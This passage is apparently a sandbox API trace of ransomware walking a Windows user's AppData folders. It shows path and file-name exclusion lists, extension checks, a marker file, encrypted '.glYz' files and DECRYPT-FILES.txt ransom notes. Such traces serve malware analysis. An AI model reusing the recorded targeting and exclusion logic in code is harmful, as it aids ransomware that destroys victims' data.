dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x27c [0182.158] GetFileSizeEx (in: hFile=0x27c, lpFileSize=0x36fdab0 | out: lpFileSize=0x36fdab0*=3862) returned 1 [0182.158] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x280 [0182.158] MapViewOfFile (hFileMappingObject=0x280, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x8a0000 [0182.159] UnmapViewOfFile (lpBaseAddress=0x8a0000) returned 1 [0182.159] CloseHandle (hObject=0x280) returned 1 [0182.159] CloseHandle (hObject=0x27c) returned 1 [0182.159] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0182.159] FindNextFileW (in: hFindFile=0x479978, lpFindFileData=0x36feb18 | out: lpFindFileData=0x36feb18*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x28d97bc0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2d207440, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xabc987a0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0xf16, dwReserved0=0x0, dwReserved1=0x0, cFileName="Videos.library-ms.glYz", cAlternateFileName="VIDEOS~1.GLY")) returned 0 [0182.159] FindClose (in: hFindFile=0x479978 | out: hFindFile=0x479978) returned 1 [0182.159] CloseHandle (hObject=0x274) returned 1 [0182.159] FindNextFileW (in: hFindFile=0x479938, lpFindFileData=0x36fed94 | out: lpFindFileData=0x36fed94*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xaf736560, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaf736560, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Network Shortcuts", cAlternateFileName="NETWOR~1")) returned 1 [0182.159] lstrcmpW (lpString1="Network Shortcuts", lpString2=".") returned 1 [0182.160] lstrcmpW (lpString1="Network Shortcuts", lpString2="..") returned 1 [0182.160] lstrcatW (in: lpString1="Network Shortcuts", lpString2="\\" | out: lpString1="Network Shortcuts\\") returned="Network Shortcuts\\" [0182.160] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\", lpString2="Network Shortcuts\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Network Shortcuts\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Network Shortcuts\\" [0182.160] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Network Shortcuts\\", lpSrch="\\Program Files") returned 0x0 [0182.160] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Network Shortcuts\\", lpSrch=":\\Windows") returned 0x0 [0182.160] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Network Shortcuts\\", lpSrch="\\Games\\") returned 0x0 [0182.160] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Network Shortcuts\\", lpSrch="\\Tor Browser\\") returned 0x0 [0182.160] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Network Shortcuts\\", lpSrch="\\ProgramData\\") returned 0x0 [0182.160] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Network Shortcuts\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0182.160] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Network Shortcuts\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0182.160] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Network Shortcuts\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0182.160] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Network Shortcuts\\", lpSrch="\\All Users") returned 0x0 [0182.160] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Network Shortcuts\\", lpSrch="\\IETldCache\\") returned 0x0 [0182.160] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Network Shortcuts\\", lpSrch="\\Local Settings\\") returned 0x0 [0182.160] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Network Shortcuts\\", lpSrch="\\AppData\\Local") returned 0x0 [0182.160] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Network Shortcuts\\", lpSrch="AhnLab") returned 0x0 [0182.160] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Network Shortcuts\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0182.160] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Network Shortcuts\\") returned 82 [0182.160] lstrlenW (lpString="0a16c9.tmp") returned 10 [0182.160] wsprintfW (in: param_1=0x36fe2f8, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Network Shortcuts\\\\0a16c9.tmp") returned 93 [0182.160] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Network Shortcuts\\\\0a16c9.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\network shortcuts\\0a16c9.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x274 [0182.161] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Network Shortcuts\\") returned 82 [0182.161] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0182.161] wsprintfW (in: param_1=0x36fe2f8, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Network Shortcuts\\\\DECRYPT-FILES.txt") returned 100 [0182.161] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Network Shortcuts\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\network shortcuts\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0182.161] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Network Shortcuts\\") returned 82 [0182.161] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Network Shortcuts\\", lpString2="*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Network Shortcuts\\*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Network Shortcuts\\*" [0182.161] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Network Shortcuts\\*", lpFindFileData=0x36feb18 | out: lpFindFileData=0x36feb18*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xef995500, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xef995500, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x479978 [0182.161] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0182.161] FindNextFileW (in: hFindFile=0x479978, lpFindFileData=0x36feb18 | out: lpFindFileData=0x36feb18*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xef995500, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xef995500, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0182.161] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0182.161] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0182.161] FindNextFileW (in: hFindFile=0x479978, lpFindFileData=0x36feb18 | out: lpFindFileData=0x36feb18*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xef995500, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xef995500, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xef995500, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="0a16c9.tmp", cAlternateFileName="")) returned 1 [0182.161] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="DECRYPT-FILES.txt") returned -1 [0182.161] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="autorun.inf") returned -1 [0182.161] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="boot.ini") returned -1 [0182.161] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="desktop.ini") returned -1 [0182.161] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="ntuser.dat") returned -1 [0182.161] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="iconcache.db") returned -1 [0182.161] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="bootsect.bak") returned -1 [0182.161] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="ntuser.dat.log") returned -1 [0182.162] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="thumbs.db") returned -1 [0182.162] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="Bootfont.bin") returned -1 [0182.162] lstrlenW (lpString="0a16c9.tmp") returned 10 [0182.162] lstrcmpiW (lpString1="tmp", lpString2="lnk") returned 1 [0182.162] lstrcmpiW (lpString1="tmp", lpString2="exe") returned 1 [0182.162] lstrcmpiW (lpString1="tmp", lpString2="sys") returned 1 [0182.162] lstrcmpiW (lpString1="tmp", lpString2="dll") returned 1 [0182.162] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Network Shortcuts\\") returned 82 [0182.162] lstrlenW (lpString="0a16c9.tmp") returned 10 [0182.162] lstrcpyW (in: lpString1=0x36fe2e8, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Network Shortcuts\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Network Shortcuts\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Network Shortcuts\\" [0182.162] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Network Shortcuts\\", lpString2="0a16c9.tmp" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Network Shortcuts\\0a16c9.tmp") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Network Shortcuts\\0a16c9.tmp" [0182.162] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0182.162] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Network Shortcuts\\0a16c9.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\network shortcuts\\0a16c9.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0182.162] CloseHandle (hObject=0x0) returned 0 [0182.162] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0182.162] FindNextFileW (in: hFindFile=0x479978, lpFindFileData=0x36feb18 | out: lpFindFileData=0x36feb18*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xabcbe900, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xabcbe900, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xabcbe900, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0182.162] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0182.162] FindNextFileW (in: hFindFile=0x479978, lpFindFileData=0x36feb18 | out: lpFindFileData=0x36feb18*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xabcbe900, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xabcbe900, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xabcbe900, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 0 [0182.163] FindClose (in: hFindFile=0x479978 | out: hFindFile=0x479978) returned 1 [0182.163] CloseHandle (hObject=0x274) returned 1 [0182.163] FindNextFileW (in: hFindFile=0x479938, lpFindFileData=0x36fed94 | out: lpFindFileData=0x36fed94*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xb0108020, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0108020, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Printer Shortcuts", cAlternateFileName="PRINTE~1")) returned 1 [0182.163] lstrcmpW (lpString1="Printer Shortcuts", lpString2=".") returned 1 [0182.163] lstrcmpW (lpString1="Printer Shortcuts", lpString2="..") returned 1 [0182.163] lstrcatW (in: lpString1="Printer Shortcuts", lpString2="\\" | out: lpString1="Printer Shortcuts\\") returned="Printer Shortcuts\\" [0182.163] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\", lpString2="Printer Shortcuts\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Printer Shortcuts\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Printer Shortcuts\\" [0182.163] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Printer Shortcuts\\", lpSrch="\\Program Files") returned 0x0 [0182.163] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Printer Shortcuts\\", lpSrch=":\\Windows") returned 0x0 [0182.163] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Printer Shortcuts\\", lpSrch="\\Games\\") returned 0x0 [0182.163] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Printer Shortcuts\\", lpSrch="\\Tor Browser\\") returned 0x0 [0182.163] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Printer Shortcuts\\", lpSrch="\\ProgramData\\") returned 0x0 [0182.163] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Printer Shortcuts\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0182.163] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Printer Shortcuts\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0182.163] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Printer Shortcuts\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0182.163] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Printer Shortcuts\\", lpSrch="\\All Users") returned 0x0 [0182.163] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Printer Shortcuts\\", lpSrch="\\IETldCache\\") returned 0x0 [0182.163] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Printer Shortcuts\\", lpSrch="\\Local Settings\\") returned 0x0 [0182.163] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Printer Shortcuts\\", lpSrch="\\AppData\\Local") returned 0x0 [0182.163] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Printer Shortcuts\\", lpSrch="AhnLab") returned 0x0 [0182.163] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Printer Shortcuts\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0182.163] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Printer Shortcuts\\") returned 82 [0182.163] lstrlenW (lpString="0a16c9.tmp") returned 10 [0182.163] wsprintfW (in: param_1=0x36fe2f8, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Printer Shortcuts\\\\0a16c9.tmp") returned 93 [0182.163] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Printer Shortcuts\\\\0a16c9.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\printer shortcuts\\0a16c9.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x274 [0182.164] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Printer Shortcuts\\") returned 82 [0182.164] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0182.164] wsprintfW (in: param_1=0x36fe2f8, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Printer Shortcuts\\\\DECRYPT-FILES.txt") returned 100 [0182.164] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Printer Shortcuts\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\printer shortcuts\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0182.164] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Printer Shortcuts\\") returned 82 [0182.164] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Printer Shortcuts\\", lpString2="*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Printer Shortcuts\\*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Printer Shortcuts\\*" [0182.164] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Printer Shortcuts\\*", lpFindFileData=0x36feb18 | out: lpFindFileData=0x36feb18*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xef995500, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xef995500, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x479978 [0182.164] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0182.164] FindNextFileW (in: hFindFile=0x479978, lpFindFileData=0x36feb18 | out: lpFindFileData=0x36feb18*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xef995500, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xef995500, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0182.165] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0182.165] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0182.165] FindNextFileW (in: hFindFile=0x479978, lpFindFileData=0x36feb18 | out: lpFindFileData=0x36feb18*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xef995500, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xef995500, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xef995500, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="0a16c9.tmp", cAlternateFileName="")) returned 1 [0182.165] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="DECRYPT-FILES.txt") returned -1 [0182.165] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="autorun.inf") returned -1 [0182.165] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="boot.ini") returned -1 [0182.165] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="desktop.ini") returned -1 [0182.165] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="ntuser.dat") returned -1 [0182.165] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="iconcache.db") returned -1 [0182.165] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="bootsect.bak") returned -1 [0182.165] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="ntuser.dat.log") returned -1 [0182.165] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="thumbs.db") returned -1 [0182.165] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="Bootfont.bin") returned -1 [0182.165] lstrlenW (lpString="0a16c9.tmp") returned 10 [0182.165] lstrcmpiW (lpString1="tmp", lpString2="lnk") returned 1 [0182.165] lstrcmpiW (lpString1="tmp", lpString2="exe") returned 1 [0182.165] lstrcmpiW (lpString1="tmp", lpString2="sys") returned 1 [0182.165] lstrcmpiW (lpString1="tmp", lpString2="dll") returned 1 [0182.165] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Printer Shortcuts\\") returned 82 [0182.165] lstrlenW (lpString="0a16c9.tmp") returned 10 [0182.165] lstrcpyW (in: lpString1=0x36fe2e8, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Printer Shortcuts\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Printer Shortcuts\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Printer Shortcuts\\" [0182.165] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Printer Shortcuts\\", lpString2="0a16c9.tmp" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Printer Shortcuts\\0a16c9.tmp") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Printer Shortcuts\\0a16c9.tmp" [0182.165] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0182.165] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Printer Shortcuts\\0a16c9.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\printer shortcuts\\0a16c9.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0182.166] CloseHandle (hObject=0x0) returned 0 [0182.166] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0182.166] FindNextFileW (in: hFindFile=0x479978, lpFindFileData=0x36feb18 | out: lpFindFileData=0x36feb18*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xabce4a60, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xabce4a60, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xabd0abc0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0182.166] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0182.166] FindNextFileW (in: hFindFile=0x479978, lpFindFileData=0x36feb18 | out: lpFindFileData=0x36feb18*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xabce4a60, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xabce4a60, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xabd0abc0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 0 [0182.166] FindClose (in: hFindFile=0x479978 | out: hFindFile=0x479978) returned 1 [0182.166] CloseHandle (hObject=0x274) returned 1 [0182.166] FindNextFileW (in: hFindFile=0x479938, lpFindFileData=0x36fed94 | out: lpFindFileData=0x36fed94*(dwFileAttributes=0x2016, 